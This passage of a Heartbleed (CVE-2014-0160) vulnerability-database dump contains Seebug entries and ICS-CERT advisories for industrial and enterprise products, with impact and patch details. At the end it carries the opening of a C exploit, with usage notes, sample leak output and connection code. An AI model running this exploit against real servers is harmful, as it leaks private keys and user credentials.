["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62187", "id": "SSV:62187", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:43", "description": "CVE ID:CVE-2014-0160\r\n\r\nOracle Session Monitor Suite\u662f\u4e00\u6b3eOracle\u516c\u53f8\u63a8\u51fa\u7684\u4f1a\u8bdd\u76d1\u89c6\u5957\u4ef6\u3002\r\n\r\nOracle Session Monitor Suite\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\r\n0\r\nOracle Session Monitor Suite 3.x\r\nOracle Session 
Monitor Suite 3.3.40.2.1\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.oracle.com", "published": "2014-04-21T00:00:00", "title": "Oracle Session Monitor Suite OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62240", "id": "SSV:62240", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:30", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Email Gateway\u662f\u4e00\u6b3e\u5168\u9762\u7684\u7535\u5b50\u90ae\u4ef6\u5b89\u5168\u89e3\u51b3\u65b9\u6848\u3002\r\n\r\nMcAfee Email Gateway\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nMcAfee Email Gateway 7.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttps://kc.mcafee.com/corporate/index?page=content&id=SB10071", "published": "2014-04-16T00:00:00", "title": "McAfee Email Gateway OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62192", "id": "SSV:62192", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}], "ics": 
[{"lastseen": "2020-12-18T03:21:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nSchneider Electric Wonderware\u2019s Cyber Security Team has identified an OpenSSL Heartbleed vulnerability in the Wonderware Intelligence application, caused by a third-party component. Schneider Electric Wonderware has produced a patch that mitigates this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe latest release of Schneider Electric Wonderware Intelligence Version 1.5 SP1 is not susceptible to the OpenSSL vulnerability. However, users have been known to reinstall Tableau Server, the vulnerable third-party component that is affected. Therefore, Schneider Electric Wonderware has issued a patch and a security bulletin addressing this vulnerability in all versions.\n\nTableaua has been identified as the third-party component vendor that has product vulnerable to the OpenSSL Heartbleed bug. The following Tableau products susceptible to the OpenSSL vulnerability used in the Schneider Electric Wonderware Intelligence product are:\n\n * Tableau Server ver 8.0.6 through 8.0.9\n * \u200bTableau Server ver 8.1.0 through 8.1.5.\n\n## IMPACT\n\nA missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64kB of memory on a connected device. An attacker who successfully exploits this vulnerability may obtain the user credentials and cryptographic keys used to access the device.\n\nImpact to individual organizations depends on many factors that are unique to each organization. 
NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSchneider Electric corporate headquarters is located in Paris, France, and maintains offices in more than 100 countries worldwide.\n\nSchneider Electric Wonderware Intelligence is a real-time operations management software distributed by Schneider Electric. Schneider Electric provides automation and information technologies and systems.\n\nAccording to Schneider Electric, Wonderware Intelligence is deployed across several sectors including Critical Manufacturing, Energy, Healthcare and Public Health, and Water and Wastewater Systems. Schneider Electric states that these products are used worldwide.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFER [b]\n\nThe Heartbleed bug could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal data like transmitted data, passwords, or private keys. The attacker must have network access to the affected devices to exploit this vulnerability.\n\nCVE-2014-0160 [c] has been assigned to this vulnerability. 
A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).d\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nSchneider Electric Wonderware has issued Security Advisory \u201cTableau OpenSSL Vulnerability (LFSEC00000098),\u201d available at (user registration required to access this site):\n\n<https://wdn.wonderware.com/sites/WDN/Pages/Security%20Central/CyberSecurityUpdates.aspx>\n\nTableau has released several firmware update fixes for the OpenSSL vulnerability. Schneider Electric Wonderware has incorporated and successfully tested Wonderware Intelligence Security patch LFSec00000098 (registration required). Tableau has released the following maintenance Versions 8.1.6 and 8.0.10 on its primary and alternate download sites.\n\nThe Tableau primary customer download site (User registration required to access this site) is located here:\n\n<https://auth.tableausoftware.com/user/login?>\n\nThe Tableau alternate download site, where Version 8.1.6 for Desktop and Server (4/10/2014) is available, is located here:\n\n<https://licensing.tableausoftware.com/esdalt/>\n\nSchneider Electric Wonderware recommends customers who have enabled SSL using Tableau Server Versions 8.0.6 through 8.0.9 or 8.1.0 through 8.1.5 should apply the security update to all nodes where the Tableau Dashboard Server is installed. The process consists of uninstalling the Dashboard Server and installing the new version. 
The server configuration and published dashboards will be preserved during the installation of the new version.\n\nAny certificates used to configure the SSL communications should be revoked, and new certificates should be acquired and used after patching the vulnerability, because the associated cryptographic keys may have been exposed.\n\nAny passwords used for accessing the server should also be changed after applying the update.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. 
Tableau Software release notes http://www.tableausoftware.com/support/releases, last accessed May 15, 2014.\n * b. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * c. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * d. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-02>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-08-27T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-02", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-02", "title": "Schneider Electric Wonderware Intelligence Security Patch for OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:55", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nThis updated advisory is a follow-up to the updated advisory titled ICSA-14-105-03A Siemens Industrial Products OpenSSL Heartbleed 
Vulnerability that was published April 29, 2014, on the NCCIC/ICS-CERT web site.\n\nSiemens reported to ICS-CERT a list of products affected by the OpenSSL vulnerability (known as \u201cHeartbleed\u201d). Joel Langill of Infrastructure Defense Security Services reported to ICS-CERT and Siemens the OpenSSL vulnerability affecting the S7-1500.\n\n### **\\--------- Begin Update B Part 1 of 3 --------**\n\nSiemens has produced an update and Security Advisory (SSA-635659) that mitigates this vulnerability in each of the affected products listed below.\n\n### **\\--------- End Update B Part 1 of 3 ----------**\n\nThis vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\n### **\\--------- Begin Update **B** Part 2 of 3 --------**\n\nThe following Siemens products are affected:\n\n * eLAN-8.2 eLAN prior to 8.3.3 (affected when RIP is used\u2014update available),\n * WinCC OA only V3.12 (always affected\u2014update available),\n * S7-1500 V1.5 (affected when HTTPS active\u2014update available),\n * CP1543-1 V1.1 (affected when FTPS active\u2014update available), and\n * APE 2.0 (affected when SSL/TLS component is used in customer implementation\u2014update available).\n\n### **\\--------- End Update B Part 2 of 3 ----------**\n\n## IMPACT\n\nA successful \u201cHeartbleed\u201d exploit of the affected products by an attacker with network access could allow attackers to read sensitive data (to include private keys and user credentials) from the process memory.\n\nImpact to individual organizations depends on many factors that are unique to each organization. 
ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nSiemens is a multinational company headquartered in Munich, Germany.\n\nThe affected Siemens industrial products are for process and network control and monitoring in critical infrastructure sectors such as Chemical, Critical Manufacturing, Energy, Food and Agriculture, and Water and Wastewater Systems.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### BUFFER ERRORSa\n\nThe Heartbleed vulnerability could allow attackers to read unallocated memory of OpenSSL running processes. This could reveal secrets like transmitted data, passwords, or private keys.\n\nCVE-2014-0160b has been assigned to this vulnerability. A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nThe attacker must have network access to the affected devices to exploit this vulnerability. Siemens recommends operating all products except perimeter devices only within trusted networks.\n\n### **\\--------- Begin Update B Part 3 of 3 --------**\n\nSiemens provides updates for the following products:\n\n * eLAN-8.2. To obtain the update to Version 8.3.3, submit a support request online at:\n\n<http://www.siemens.com/automation/support-request>\n\n * WinCC OA V3.12. The update for WinCC OA 3.12 can be obtained here (login required):\n\n[https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80](<https://portal.etm.at/index.php?option=com_content&view=category&id=65&layout=blog&Itemid=80>)\n\n * CP-1543-1 V1.1. 
The update for CP-1543 V1.1 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/92417421>\n\n * APE 2.0. The update for APE can be obtained here:\n\n<http://www.ruggedcom.com/support/appnotes/>\n\n * S7-1500 V1.5. The update for S7-1500 V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/67295862/133100>\n\n * S7-1500 V1.5. The update for S7-1500 Failsafe V1.5 can be obtained here:\n\n<http://support.automation.siemens.com/WW/view/en/87493352/133100>\n\n### **\\--------- End Update B Part 3 of 3 ----------**\n\nSiemens provides specific advice for mitigating risk in each of the affected products in SSA\u2011635659, which can be found at their web site at the following location:\n\n<http://www.siemens.com/cert/advisories>\n\nThe researcher suggests that, if HTTPS is not needed, it be disabled until a patch is available and has been applied to the vulnerable product/service.\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. 
ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed April 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed April 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed April 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-105-03B>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-20T00:00:00", "id": "ICSA-14-105-03B", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-105-03B", "title": "Siemens Industrial Products OpenSSL Heartbleed Vulnerability (Update B)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-18T03:21:51", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "## OVERVIEW\n\nOn April 09, 2014, Unified Automation GmbH announced that its OPC UA Software Development Kits (SDKs) for Windows included vulnerable OpenSSL libraries. HTTPS support is disabled by default in Unified Automation SDK products. However, if HTTPS is used, Unified Automation recommends replacing the OpenSSL library with a current version (1.0.1g or later) to mitigate this vulnerability.\n\nThis vulnerability could be exploited remotely. Exploits that target this vulnerability are known to be publicly available.\n\n## AFFECTED PRODUCTS\n\nThe following Unified Automation GmbH OPC UA SDK for Windows versions are affected:\n\n * C++ based OPC UA SDK V1.4.0 (Windows), and\n * ANSI C based OPC UA SDK V1.4.0 (Windows).\n\n## IMPACT\n\nIf HTTPS is enabled, the OPC UA SDK is exposed to the OpenSSL vulnerability. A missing bounds check in the handling of the TLS Heartbeat extension can be used to reveal up to 64 kB of memory on a connected device. 
An attacker who successfully exploits this vulnerability could read data passed to this device to include the user credentials and cryptographic keys.\n\nImpact to individual organizations depends on many factors that are unique to each organization. NCCIC/ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## BACKGROUND\n\nUnified Automation GmbH is a German-based company with SDKs sold worldwide and a majority of customers in Europe and the United States. SDKs are used in critical manufacturing and energy sectors. The SDKs are used by manufacturers of programmable logic controllers, human-machine interface/supervisory control and data acquisition, Data Logging and Supervisory Control (DSC) systems and some manufacturing execution systems (MES) vendors.\n\nThe affected products, C++ based OPC UA SDK V1.4.0 (Windows) and ANSI C-based OPC UA SDK V1.4.0, are software development kits for OPC. Unified Automation offers products and services in the field of standardized communication in automation industry.\n\n## VULNERABILITY CHARACTERIZATION\n\n### VULNERABILITY OVERVIEW\n\n### IMPROPER RESTRICTION OF OPERATIONS WITHIN THE BOUNDS OF A MEMORY BUFFERa\n\nThe C++ UA OPC SDK and ANSI C OPC SDK V1.4.0 use the vulnerable version of OpenSSL 1.0.1f. This affects the use of HTTPS connections, if enabled.\n\nCVE-2014-0160b has been assigned to this vulnerability. 
A CVSS v2 base score of 5.0 has been assigned; the CVSS vector string is (AV:N/AC:L/Au:N/C:P/I:N/A:N).c\n\n### VULNERABILITY DETAILS\n\n#### EXPLOITABILITY\n\nThis vulnerability could be exploited remotely.\n\n#### EXISTENCE OF EXPLOIT\n\nExploits that target this vulnerability are publicly available.\n\n#### DIFFICULTY\n\nAn attacker with a low skill would be able to exploit this vulnerability.\n\n## MITIGATION\n\nUnified Automation recommends the following solutions for customers using the HTTPS functionality:\n\n * Disable HTTPS transport by configuration in the C++ SDK (default),\n * Recompile the SDK without HTTPs Support (default), or\n * Download the current version of OpenSSL from [http://www.openssl.org](<http://www.openssl.org/>) or the personal download area on the Unified Automation web site and recompile the SDK.\n\nFurther information from Unified Automation can be found on its web site:\n\n<http://www.unified-automation.com/news/news-details/article/1139-heartbleed-bug-in-openssl.html>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. 
Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 15, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 15, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last accessed May 15, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-135-04>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-05-15T00:00:00", "id": "ICSA-14-135-04", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-135-04", "title": "Unified Automation OPC SDK OpenSSL Vulnerability", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "edition": 1, "published": "2014-04-10T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Information Leak (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-10T00:00:00", "id": "EXPLOITPACK:E5ADFE523AF247AA238C3E63EF7B0A8F", "href": "", "sourceData": "/* \n* CVE-2014-0160 heartbleed OpenSSL information leak exploit\n* =========================================================\n* This exploit uses OpenSSL to create an encrypted connection\n* and trigger the heartbleed leak. The leaked information is\n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. 
You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS.\n* This exploit leaks upto 65535 bytes of remote heap each request\n* and can be run in a loop until the connected peer ends connection.\n* The data leaked contains 16 bytes of random padding at the end.\n* The exploit can be used against a connecting client or server,\n* it can also send pre_cmd's to plain-text services to establish\n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients\n* will often forcefully close the connection during large leak\n* requests so try to lower your payload request size. \n*\n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n*\n* E.g.\n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed\n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1\n* [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\n* [ =============================================================\n* [ connecting to 192.168.11.23 443/tcp\n* [ connected to 192.168.11.23 443/tcp\n* [ <3 <3 <3 heart bleed <3 <3 <3\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ heartbleed leaked length=65535\n* [ final record type=24, length=16384\n* [ wrote 16381 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=16408\n* [ decrypting SSL packet\n* [ final record type=24, length=16384\n* [ wrote 16384 bytes of heap to file 'out'\n* [ heartbeat returned type=24 length=42\n* [ decrypting SSL packet\n* [ final record type=24, length=18\n* [ wrote 18 bytes of heap to file 'out'\n* [ done.\n* $ ls -al out\n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out\n* $ hexdump -C out\n* - snip 
- snip \n*\n* Use following example command to generate certificates for clients.\n*\n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\\n* -keyout server.key -out server.crt\n*\n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\\n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n*\n* todo: add udp/dtls support.\n*\n* - Hacker Fantastic\n* http://www.mdsec.co.uk\n*\n*/\n#include <stdio.h>\n#include <stdint.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <getopt.h>\n#include <signal.h>\n#include <netdb.h>\n#include <fcntl.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <inttypes.h>\n#include <openssl/bio.h>\n#include <openssl/ssl.h>\n#include <openssl/err.h>\n#include <openssl/evp.h>\n#include <openssl/tls1.h>\n#include <openssl/rand.h>\n#include <openssl/buffer.h>\n\n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\\n\t\t(((unsigned int)(c[1])) )),c+=2)\n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\\n\t\t c[1]=(unsigned char)(((s) )&0xff)),c+=2)\n\nint first = 0;\nint leakbytes = 0;\nint repeat = 1;\nint badpackets = 0;\n\ntypedef struct {\n\tint socket;\n\tSSL *sslHandle;\n\tSSL_CTX *sslContext;\n} connection;\n\ntypedef struct {\n unsigned char type;\n short version;\n unsigned int length;\n unsigned char hbtype;\n unsigned int payload_length;\n void* payload;\n} heartbeat;\n\nvoid ssl_init();\nvoid usage();\nint tcp_connect(char*,int);\nint tcp_bind(char*, int);\nconnection* tls_connect(int);\nconnection* tls_bind(int);\nint pre_cmd(int,int,int);\nvoid* heartbleed(connection* ,unsigned int);\nvoid* sneakyleaky(connection* ,char*, int);\n\nint tcp_connect(char* server,int port){\n\tint sd,ret;\n\tstruct hostent *host;\n struct sockaddr_in sa;\n host = gethostbyname(server);\n sd = socket(AF_INET, SOCK_STREAM, 0);\n if(sd==-1){\n\t\tprintf(\"[!] 
cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tsa.sin_family = AF_INET;\n sa.sin_port = htons(port);\n sa.sin_addr = *((struct in_addr *) host->h_addr);\n bzero(&(sa.sin_zero),8);\n\tprintf(\"[ connecting to %s %d/tcp\\n\",server,port);\n ret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr));\n\tif(ret==0){\n\t\tprintf(\"[ connected to %s %d/tcp\\n\",server,port);\n\t}\n\telse{\n\t\tprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port);\n\t\texit(0);\n\t}\n\treturn sd;\n}\n\nint tcp_bind(char* server, int port){\n\tint sd, ret, val=1;\n\tstruct sockaddr_in sin;\n\tstruct hostent *host;\n\thost = gethostbyname(server);\n\tsd=socket(AF_INET,SOCK_STREAM,0);\n\tif(sd==-1){\n \t\tprintf(\"[!] cannot create socket\\n\");\n\t\texit(0);\n\t}\n\tmemset(&sin,0,sizeof(sin));\n\tsin.sin_addr=*((struct in_addr *) host->h_addr);\n\tsin.sin_family=AF_INET;\n\tsin.sin_port=htons(port);\n \tsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val));\n\tret = bind(sd,(struct sockaddr *)&sin,sizeof(sin));\n\tif(ret==-1){\n\t\tprintf(\"[!] 
